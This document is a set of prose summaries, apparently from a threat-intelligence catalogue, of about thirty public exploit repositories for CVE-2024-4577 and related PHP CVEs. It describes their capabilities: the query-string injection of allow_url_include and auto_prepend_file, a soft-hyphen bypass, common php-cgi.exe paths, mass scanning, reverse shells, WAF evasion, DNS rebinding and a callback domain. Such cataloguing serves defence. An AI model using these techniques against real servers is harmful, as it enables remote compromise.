PHP-CGI Argument Injection RCE on Windows

This repository is a standalone Bash-based exploit toolkit centered on PHP8.1.x_Exploit.sh, which orchestrates detection and exploitation of four PHP CVEs using modular helper scripts under modules/. The main script normalizes target URLs, fingerprints OS and PHP version via HTTP headers and a phpinfo.php probe, crawls homepage links/forms, enumerates likely CGI and upload endpoints, and then invokes per-CVE modules. The repository structure is simple: one main driver script, four CVE-specific Bash modules, one shared utils module, and a README. Primary exploit capability is CVE-2024-4577 against Windows PHP-CGI. The module tests two query-string injection variants, including a soft-hyphen bypass, by setting allow_url_include and auto_prepend_file=php://input and POSTing PHP code. On success it either demonstrates command execution with whoami or launches a PowerShell reverse shell to an operator-supplied IP/port. This is a real exploitation path providing RCE. A second remote capability targets CVE-2025-14177 by generating malformed JPEG files and POSTing them to discovered upload endpoints using multipart form field file. Detection looks for a marker string or long printable output in responses; exploitation repeats the upload 10 times and stores raw responses and extracted strings under a reports subdirectory, aiming to capture leaked heap data. The remaining two modules, CVE-2025-14180 and CVE-2025-14178, are effectively local/RCE-follow-on checks and crash payloads rather than pure remote exploits. Both use php -r locally when PHP CLI is present; the exploit functions POST PHP snippets to a target URL if remote code execution is already available. CVE-2025-14180 attempts to trigger a PDO PostgreSQL null dereference using DSN pgsql:host=localhost;dbname=postgres with emulated prepares enabled. CVE-2025-14178 attempts an array_merge integer overflow by allocating extremely large arrays. Both are described as potentially crashing or destabilizing the PHP process. Overall, this is an operational multi-CVE web exploitation script, not just a detector. It supports single-target and batch modes, optional GNU parallel execution, report logging, and automatic exploitation unless scan-only is specified. Fingerprintable targets include common CGI paths, common upload paths, phpinfo.php probing, php://input injection, localhost PostgreSQL access, and attacker-defined reverse-shell callback endpoints.

This repository contains a Python proof-of-concept exploit for CVE-2024-4577, a PHP-CGI argument injection vulnerability. The main file, cve-2024-4577.py, allows a user to test a remote server for the vulnerability and, if present, execute arbitrary PHP code via a crafted POST request to the /php-cgi/php-cgi.exe endpoint. The script accepts a target URL and an optional custom PHP payload, defaulting to phpinfo() for detection. If a custom payload is provided, it can be used to execute system commands (e.g., whoami) on the target. The exploit is operational and can be used for both detection and exploitation. The repository also includes a brief readme.md with usage instructions. No hardcoded IPs or domains are present; the endpoint is constructed based on user input.

This repository is a proof-of-concept (PoC) exploit for CVE-2024-4577, targeting PHP-CGI instances (such as those in XAMPP) on internal networks via DNS rebinding and browser-based attacks. The exploit consists of a Python server (server.py) that serves a malicious HTML/JavaScript client (client.html). The attacker configures the server with their DuckDNS credentials and public IP, and the client.html is delivered to the victim. When the victim opens the page, the JavaScript orchestrates a DNS rebinding attack using DuckDNS, causing the victim's browser to interact with internal PHP-CGI servers as if they were the attacker's server. The script then delivers a PHP payload (by default, executing 'calc' as a demonstration) to the internal server, exploiting CVE-2024-4577 for remote code execution. The exploit is highly configurable, allowing the attacker to specify payloads and target IPs. The repository demonstrates a sophisticated browser-to-internal-network attack chain, requiring only that the victim visit a malicious web page. The main files are server.py (Python HTTP server and DNS update logic), client.html (exploit logic and payload delivery), and README.md (detailed setup and usage instructions).

This repository is a comprehensive CTF challenge environment demonstrating exploitation of CVE-2024-4577, a critical PHP CGI argument injection vulnerability. The structure includes: - **attack-scripts/**: Contains Python and Bash scripts (`exploit.py`, `exploit.sh`, `container-escape.py`) to automate exploitation, file reading, command execution, container escape, and AWS pivoting. - **vulnerable-app/**: A minimal PHP web application (`index.php`, `info.php`) and Dockerfile, intentionally misconfigured to run PHP in CGI mode and allow argument injection. The flag file (`/flag.txt`) is the main target. - **kubernetes/**: Manifests for deploying the vulnerable app in a Kubernetes cluster, with privileged containers, host mounts (`/host`, `/dev`, `/proc`, `/sys`), and Docker socket exposure for advanced exploitation and container escape scenarios. AWS credentials are provided via ConfigMap for cloud pivoting. - **docker/**: Docker Compose and frontend files for local or CTF deployment. - **Documentation**: Multiple guides and walkthroughs detail exploitation steps, deployment, and security considerations. **Exploit Capabilities:** - Exploits CVE-2024-4577 via HTTP requests with crafted PATH_INFO to inject PHP command-line arguments, enabling arbitrary file read (e.g., `/flag.txt`), command execution, and code execution. - Advanced scripts attempt container escape by accessing host filesystems and Docker socket, and pivot to AWS using provided credentials. - Can establish a reverse shell if the attacker provides a listener IP and port. **Endpoints:** - Main HTTP endpoint (default: `http://localhost:8080` or via Kubernetes LoadBalancer/Ingress) - File targets: `/flag.txt`, `/etc/passwd`, `/host`, `/var/run/docker.sock`, and others - AWS resources (via fake credentials in the CTF) **Purpose:** The repository is designed for educational and CTF use, providing a realistic, multi-stage exploitation chain: initial web exploit, container escape, and cloud pivoting. It demonstrates the risks of insecure PHP CGI configurations, container privilege escalation, and cloud credential exposure. The environment is highly configurable for both local and internet-facing deployments, with extensive documentation and security warnings.

This repository provides a proof-of-concept (POC) environment and exploit for CVE-2024-4577, a critical PHP CGI argument injection vulnerability on Windows. The repository includes configuration files (httpd.conf, httpd-xampp.conf) to set up an Apache + PHP-CGI environment, a check.php script to verify if the environment is vulnerable, and a test.php script to confirm PHP is working. The Readme provides a sample exploit using a POST request to inject PHP code via the query string, exploiting improper argument parsing in PHP CGI mode. The main attack vector is network-based, targeting a web server running vulnerable PHP in CGI mode. The exploit allows remote code execution by injecting PHP code that is executed by the server. The repository is structured to help users set up a vulnerable environment for testing and demonstration purposes, not for weaponized exploitation.

This repository contains a Python proof-of-concept exploit for CVE-2024-4577, a critical remote code execution vulnerability in PHP-CGI on Windows. The main script, 'CVE-2024-4577.py', takes a list of target domains and attempts to exploit them by sending a POST request with a crafted query string that abuses PHP-CGI argument injection. The payload '<?php phpinfo(); ?>' is sent in the request body, and the script checks the response for evidence of code execution (the presence of 'PHP Version'). Vulnerable endpoints are logged to 'vulnerable.txt'. The exploit is multithreaded for mass scanning and is intended for use against PHP installations on Windows that have not been patched to the latest versions. The repository also includes a README with usage instructions and a requirements.txt for dependencies. No hardcoded IPs or domains are present; targets are user-supplied via a file.

This repository contains a proof-of-concept (PoC) exploit for CVE-2024-4577, a PHP CGI argument injection vulnerability that enables remote code execution. The main file, CVE-2024-4577.py, is a Python script that takes a target URL and arbitrary PHP code as arguments. It crafts a POST request to the specified PHP endpoint, exploiting the argument injection flaw to prepend and execute the supplied PHP code on the server. The script checks for successful exploitation by looking for a specific marker ('1337') in the response. The exploit is network-based, requiring access to a vulnerable PHP CGI endpoint over HTTP. The repository is minimal, containing only the exploit script and a brief README. No hardcoded endpoints are present, but the usage example references 'http://192.168.1.1/index.php' as a target. The exploit is a PoC and does not include advanced payloads or automation for post-exploitation.

This repository provides tools for detecting and exploiting CVE-2024-4577, a critical PHP CGI argument injection vulnerability affecting Windows systems running PHP in CGI mode. The repository contains two main Python scripts: 1. CVE-2024-4577.py: A scanner that tests whether a given URL (or list of URLs) is vulnerable by sending a PHP payload and checking for a known hash in the response. It targets common CGI endpoints such as /php-cgi/php-cgi.exe, /index.php, /test.php, and /test.hello, using specially crafted query strings to trigger the vulnerability. 2. exploit.py: An exploit tool that allows the user to execute arbitrary system commands on a vulnerable server. It sends a PHP payload via HTTP POST to the vulnerable endpoint, which executes the specified command on the server and returns the output. The repository also includes a requirements.txt for dependencies and a README.md with detailed usage instructions, example commands, and background on the vulnerability. The exploit is operational, providing real command execution on vulnerable targets, and is not part of a larger framework. The main attack vector is network-based, targeting HTTP(S) endpoints exposed by PHP CGI on Windows. The endpoints tested are fingerprintable and can be used to identify potentially vulnerable systems.

This repository contains a proof-of-concept exploit for CVE-2024-4577, a remote code execution vulnerability in PHP CGI versions 8.1, 8.2, and 8.3 on Windows. The main file, 'exploit.c', is a C program that leverages libcurl and Winsock2 to send crafted HTTP POST requests to a vulnerable PHP CGI endpoint, allowing the attacker to execute arbitrary system commands on the target server. The exploit supports both direct command execution and reverse shell functionality (if a listening port is specified). It also logs activity to a local file ('CVE-2024-4577.log'). The README provides build and usage instructions, including example commands. The exploit is not part of a framework and is intended for manual use. No hardcoded IPs or domains are present; the target endpoint is user-supplied. The code is structured for clarity, with argument parsing, HTTP request handling, and optional reverse shell logic.

This repository contains a single Python exploit script (CVE-2024-4577.py) targeting the PHP CGI Argument Injection Remote Code Execution vulnerability (CVE-2024-4577). The exploit is operational and allows an attacker to execute arbitrary system commands on a vulnerable server by abusing improper argument handling in PHP CGI. The script supports both single-target and multi-target modes, using HTTP POST requests to various common PHP CGI endpoints (e.g., /php-cgi/php-cgi.exe, /cgi-bin/php-cgi.exe, etc.). It injects PHP configuration arguments via specially crafted URLs and delivers a PHP payload that executes attacker-supplied commands. The exploit is multi-threaded for mass scanning and includes output formatting and progress indication. The README is minimal and only references the exploit file. No detection-only or fake code is present; the script is a real exploit for RCE. The main attack vector is network-based, requiring HTTP(S) access to a vulnerable PHP CGI endpoint.

This repository contains a PowerShell proof-of-concept exploit for CVE-2024-4577, a PHP-CGI argument injection vulnerability. The main script, 'cve_2024_4577.ps1', defines a function that sends a specially crafted POST request to the '/php-cgi/php-cgi.exe' endpoint on target hosts within the 10.0.0.0/24 subnet, using both HTTP and HTTPS. The payload is a simple PHP script that executes the 'whoami' command, demonstrating remote code execution if the target is vulnerable. The script loops through all IPs in the subnet and both protocols, outputting the result for each attempt. The repository is structured with a single exploit script, a README with usage and background information, and a license file. No hardcoded credentials or external dependencies are present. The exploit is intended for educational and authorized penetration testing purposes only.

This repository provides a Python-based exploit for CVE-2024-4577, a PHP CGI argument injection vulnerability that enables remote code execution (RCE) on vulnerable PHP installations running in CGI mode on Windows. The main exploit logic is contained in 'main.py', which accepts a list of target URLs (either as a comma-separated string or from a file) and a command to execute. The script sends a specially crafted POST request to each target, exploiting the argument injection flaw to execute arbitrary system commands. The exploit supports parallel execution across multiple CPU cores for efficiency and logs successfully exploited targets to a file. The only code file is 'main.py', with dependencies listed in 'requirements.txt'. The attack vector is network-based, targeting HTTP endpoints running vulnerable PHP CGI. The exploit is operational, requiring the attacker to specify the command to execute, and provides full RCE if successful. No hardcoded IPs or domains are present; the targets are user-supplied.

This repository is a comprehensive exploit toolkit targeting PHP-CGI parameter injection vulnerabilities, specifically CVE-2024-4577 and CVE-2024-8926. The main exploit logic resides in 'exploit.py', which provides a command-line interface for automated vulnerability scanning and exploitation. The tool supports multiple attack modes, including remote command execution, arbitrary PHP code execution, file upload, and file download. It allows users to specify target URLs and CGI endpoints, select or customize payloads, and optionally route traffic through Tor for anonymity. A notable feature is the modular bypass system: the 'bypass_manager.py' and the 'bypass_modules/' directory provide various tamper scripts to obfuscate payloads and evade WAFs or security controls. These modules can modify payloads, CGI paths, HTTP headers (e.g., randomizing User-Agent, adding X-Forwarded-For), and more. The tool also supports forced exploitation mode, detailed logging, and animated terminal output for usability. The repository is structured as follows: - 'exploit.py': Main exploit script and entry point. - 'bypass_manager.py' and 'bypass_modules/': Framework for WAF bypass and payload tampering. - 'tor_helper.py': Utilities for routing requests through Tor. - 'requirements.txt': Python dependencies. - 'README.md': Detailed usage instructions, attack modes, and legal disclaimer. The exploit is operational, providing real attack capabilities against vulnerable PHP-CGI deployments. It is not a detection-only script, but a full-featured exploitation tool with customizable payloads and bypass techniques. The main attack vector is network-based, targeting web servers exposing PHP-CGI endpoints. The tool is suitable for red team operations, CTFs, and security research.

This repository contains a Python exploit script (CVE-2024-4577.py) targeting the argument injection vulnerability in PHP (CVE-2024-4577). The script allows the user to scan a single target or a list of targets (provided in domains.txt) for the vulnerability by sending a specially crafted POST request to the /index.php endpoint of each target. The payload, supplied via the -c/--command argument, is arbitrary PHP code that will be executed on the server if the target is vulnerable. The script checks for successful code execution by looking for a specific marker ('gotr00t') in the response. The repository also includes a README.md with usage instructions and a requirements.txt listing the Python dependencies (requests, colorama). The exploit is operational and can be used to achieve remote code execution on vulnerable PHP installations accessible over the network.

This repository provides operational exploit scripts for CVE-2024-4577, a remote code execution vulnerability affecting PHP 5 and 7. The repository contains two main Python scripts: 'cek.py' and 'cuk.py'. - 'cek.py' allows an attacker to execute arbitrary system commands on a vulnerable PHP server by exploiting the allow_url_include and auto_prepend_file directives via a crafted POST request. It supports listing directories, reading files, and finding writable directories on the target server. - 'cuk.py' is used to upload a remote PHP shell ('ini.php') from a GitHub repository to the target server's /tmp directory, enabling persistent access. Both scripts require the attacker to specify a target URL (typically an index.php endpoint) and leverage a POST request with a malicious PHP payload. The exploit is network-based and targets publicly accessible PHP endpoints. The repository is structured with a README providing usage instructions and two Python scripts implementing the exploit logic. No detection scripts or fake exploits are present; the code is functional and provides real RCE capabilities.

This repository provides a Python-based exploit and scanner for CVE-2024-4577, a PHP CGI Argument Injection vulnerability affecting PHP versions 8.1.x before 8.1.29, 8.2.x before 8.2.20, and 8.3.x before 8.3.8 on Windows systems running Apache with PHP-CGI. The main script, CVE-2024-4577.py, can scan a list of target URLs for the vulnerability and, if found, exploit it by sending arbitrary PHP code (such as a reverse shell) via a specially crafted HTTP POST request. The exploit leverages a flaw in how PHP-CGI parses command-line arguments, allowing attackers to inject PHP options and execute code. The README provides detailed usage instructions, including how to prepare a PHP payload for remote code execution and how to use the tool for both scanning and exploitation. The repository is operational, requiring the attacker to supply a PHP payload file, and is capable of establishing a reverse shell to a specified host and port. The exploit targets network-accessible HTTP endpoints, particularly /php-cgi/php-cgi.exe, and is especially effective against default XAMPP installations on Windows.

This repository contains a proof-of-concept (PoC) exploit for CVE-2024-4577, a vulnerability in PHP CGI that allows for argument injection and remote code execution. The main file, CVE-2024-4577.py, is a Python script that takes as arguments the remote host, port, target URL path, and a PHP command to execute. It crafts an HTTP POST request to the target, exploiting the vulnerability by injecting PHP configuration directives via the query string and sending arbitrary PHP code in the POST body. The script checks for successful execution by looking for a specific string ('PWNED!') in the response. The repository also includes a README.md with usage instructions. No hardcoded IPs or domains are present; the target is specified by the user at runtime. The exploit is a functional PoC and demonstrates the ability to execute arbitrary PHP code on vulnerable servers.

This repository contains a Python exploit script (CVE-2024-4577.py) and a README.md for CVE-2024-4577, a critical argument injection vulnerability in PHP running on Windows (notably in XAMPP environments). The exploit targets php-cgi.exe via HTTP(S) requests, leveraging encoding conversion issues to bypass previous mitigations and achieve unauthenticated remote code execution (RCE). The script supports both direct and blind RCE, with options to save output and test various payload delivery methods (php://input, data://, php://filter). It can also set up a local listener to detect outbound requests from the target in blind RCE scenarios. The README provides detailed usage instructions, exploitation conditions, and background on the vulnerability. The main fingerprintable endpoint is '/php-cgi/php-cgi.exe', which is used for the attack. The exploit is operational, allowing arbitrary PHP code execution on vulnerable targets.

This repository provides a Python-based exploit and scanner for CVE-2024-4577, a PHP CGI Argument Injection vulnerability affecting PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, and 8.3.* before 8.3.8 on Windows systems. The main file, CVE-2024-4577.py, can scan a target for vulnerability and exploit it by sending a specially crafted HTTP POST request to a PHP CGI endpoint (such as /php-cgi/php-cgi.exe), injecting arbitrary PHP code provided by the attacker. The exploit supports custom PHP payloads, including reverse shells. The README provides detailed usage instructions, example payloads, and references. The repository is operational and can be used to achieve remote code execution on vulnerable servers. The only code file is in Python, and the exploit is not part of a larger framework.

This repository provides a working exploit for CVE-2024-4577, a critical remote code execution vulnerability affecting PHP on Windows (versions 8.3 < 8.3.8, 8.2 < 8.2.20, 8.1 < 8.1.29) when PHP-CGI is exposed. The repository contains two main Python scripts: - CVE_2024_4577_POC.py: A proof-of-concept scanner that reads a list of URLs from 'urls.txt' and tests each for the vulnerability by sending a crafted POST request to the '/php-cgi/php-cgi.exe' endpoint. It checks for code execution by looking for a specific string in the response. - CVE_2024_4577_exp.py: An exploit script that allows the user to specify an arbitrary system command to execute on the vulnerable server, again via a POST request to the same endpoint. The PHP payload is injected via the request body and executed by the server if vulnerable. The README provides brief usage instructions. The exploit leverages the ability to pass PHP parameters via the query string to the CGI binary, bypassing restrictions and enabling arbitrary code execution. The attack vector is network-based, requiring only HTTP access to the vulnerable endpoint. The scripts are operational and allow for both detection and exploitation of the vulnerability.

This repository contains a Python exploit script (xampp.py) and a README for CVE-2024-4577, a remote code execution vulnerability affecting PHP CGI on Windows systems, specifically those configured in Simplified Chinese, Traditional Chinese, or Japanese. The exploit is designed for bulk exploitation: it reads a list of target URLs from 'xamp.txt', then uses multiple threads (default 1000) to send specially crafted POST requests to common PHP CGI endpoints (/cgi-bin/php-cgi.exe and /php-cgi/php-cgi.exe). The payloads attempt to enable 'allow_url_include' and 'auto_prepend_file' via query parameters, then inject PHP code to test for code execution. If successful, the script writes the vulnerable URLs and responses to output files. The exploit demonstrates code execution by issuing a ping to an attacker-controlled DNS domain (win.kyeezvd0.dnslog.pw), which can be monitored for callbacks. The README provides usage instructions and highlights the need to adjust the command, input file, and thread count as needed. The repository is operational and suitable for real-world exploitation, not just proof-of-concept.

This repository contains a proof-of-concept (PoC) exploit for CVE-2024-4577, a PHP CGI Argument Injection vulnerability that enables remote code execution (RCE) on vulnerable PHP installations running on Windows. The repository consists of two files: a detailed README.md explaining the vulnerability, affected versions, and usage instructions, and a Python script (watchTowr-vs-php_cve-2024-4577.py) that implements the exploit logic. The exploit works by sending a specially crafted POST request to a target PHP CGI endpoint, injecting PHP code via manipulated CGI arguments. The script requires the user to specify a target URL and the PHP code to execute. If successful, the script confirms code execution by checking for a unique marker in the response. The exploit targets PHP versions 8.3 < 8.3.8, 8.2 < 8.2.20, and 8.1 < 8.1.29 on Windows. No detection or fake code is present; this is a functional PoC exploit for RCE via network attack vector.

This repository provides a proof-of-concept (PoC) and operational exploit for CVE-2024-4577, a critical remote code execution vulnerability affecting PHP (versions 8.1.x < 8.1.29, 8.2.x < 8.2.20, 8.3.x < 8.3.8) when run as CGI on Windows (commonly with Apache, e.g., XAMPP). The main exploit script (CVEs-2024-4577.py) is written in Python and can both scan for and exploit the vulnerability. It works by sending specially crafted HTTP POST requests to vulnerable endpoints (such as /php-cgi/php-cgi.exe, /index.php, etc.), injecting PHP options via command-line arguments to enable remote code execution. If exploitation is successful, the script can upload and execute a PHP payload (rev_shell.php), which is a reverse shell that connects back to the attacker's machine, granting remote command execution. The repository includes a requirements.txt for dependencies, a sample reverse shell payload (rev_shell.php), and a detailed README.md with usage instructions, references, and detection tips. The exploit is operational and can be used for both vulnerability scanning and full exploitation, depending on the provided arguments.

This repository contains a proof-of-concept (PoC) exploit for CVE-2024-4577, a critical remote code execution (RCE) vulnerability affecting certain versions of PHP when run as CGI on Windows with Apache. The exploit is implemented in a single Python script (CVE-2024-4577.py), which allows the user to test a single URL or scan multiple URLs for vulnerability. The script works by sending a specially crafted POST request to the PHP-CGI endpoint, injecting PHP options via the query string to enable code execution. If the target is vulnerable, the script provides an interactive shell for arbitrary command execution on the remote server. The repository also includes a README.md with background information and a requirements.txt listing Python dependencies. The main attack vector is network-based, targeting HTTP endpoints that expose the vulnerable PHP-CGI binary. The exploit is a PoC and does not include advanced payload customization or post-exploitation features.

This repository contains a Python exploit script (CVE-2024-4577-PHP-RCE.py) and a detailed README for CVE-2024-4577, a critical remote code execution vulnerability in PHP for Windows (including XAMPP) when running in CGI mode. The exploit leverages improper handling of CGI parameters (notably cgi.force_redirect and REDIRECT-STATUS) to achieve RCE or arbitrary file read, even with default PHP configurations. The script implements two main exploitation methods: (1) sending a crafted HTTP request to the vulnerable php-cgi endpoint to trigger code execution or file inclusion, and (2) communicating directly with the FastCGI service to send malicious parameters and retrieve output. The README provides additional exploitation techniques (EXP 3 and 4) using POST requests and data:// payloads, and lists all affected PHP and XAMPP Windows versions. The exploit does not require special configuration on the target and is effective against default installations. The main fingerprintable endpoint is the /php-cgi/php-cgi.exe path on the target server, and the exploit demonstrates reading the system.ini file as proof of concept. The repository is operational and provides working exploit code for this vulnerability.

This repository contains a Nuclei template (CVE-2024-4577.yaml) and a README file. The template is a Proof of Concept (PoC) exploit for CVE-2024-4577, a critical PHP CGI argument injection vulnerability. The exploit works by sending a specially crafted HTTP POST request to a PHP CGI endpoint (e.g., /index.php) with manipulated query parameters that enable 'allow_url_include' and set 'auto_prepend_file' to 'php://input'. The POST body contains PHP code (phpinfo()), which, if the server is vulnerable, will be executed, demonstrating remote code execution. The template checks for successful exploitation by looking for 'PHP Version' in the response body and a 200 status code. The repository is structured for use with the Nuclei vulnerability scanner and is intended for security testing and demonstration purposes.

This repository contains a proof-of-concept (PoC) exploit for CVE-2024-4577, a PHP CGI Argument Injection vulnerability that enables remote code execution (RCE) on Windows systems running vulnerable versions of PHP in CGI mode. The repository consists of a README.md with background, affected versions, and references, and a Python script (watchTowr-vs-php_cve-2024-4577.py) that implements the exploit. The script takes a target URL and arbitrary PHP code as arguments, then sends a specially crafted POST request to the target, exploiting the argument injection to execute the supplied PHP code. The exploit checks for success by looking for a specific marker in the response. The main attack vector is network-based, targeting web servers accessible over HTTP. The exploit is a PoC and requires the attacker to supply the PHP code to be executed, demonstrating the vulnerability's impact but not providing a weaponized or automated payload.

This repository contains a Python exploit script (CVE-2024-4577.py) targeting the argument injection vulnerability in PHP (CVE-2024-4577). The script allows the user to scan a single target or a list of targets (provided in 'domains.txt') for the vulnerability. It works by sending a specially crafted POST request to the '/index.php' endpoint of the target, attempting to inject and execute arbitrary PHP code via the 'auto_prepend_file' argument. The exploit checks for successful code execution by looking for a specific string in the response. The repository includes a README with usage instructions and a requirements.txt for dependencies. The main exploit file is self-contained, multithreaded for scanning multiple domains, and operational, as it allows arbitrary command execution if the target is vulnerable.

This repository contains a Python-based scanner and exploit tool for CVE-2024-4577, a critical PHP CGI argument injection vulnerability that can lead to remote code execution (RCE). The main script, CVE-2024-4577.py, provides both scanning and exploitation capabilities. It reads a list of target URLs from a file, checks each for vulnerability by sending a crafted POST request, and, if vulnerable, can exploit the target by sending arbitrary PHP code (provided by the user in a separate file) to be executed on the server. Vulnerable targets are logged to 'victim.txt'. The tool is command-line driven, supports both scanning and exploitation modes, and uses the 'requests', 'colorama', and 'rich' Python libraries for HTTP requests and output formatting. The README provides detailed usage instructions, search queries for finding potential targets, and a disclaimer. The exploit targets PHP CGI installations on both Linux and Windows platforms, specifically versions 8.1, 8.2, and 8.3.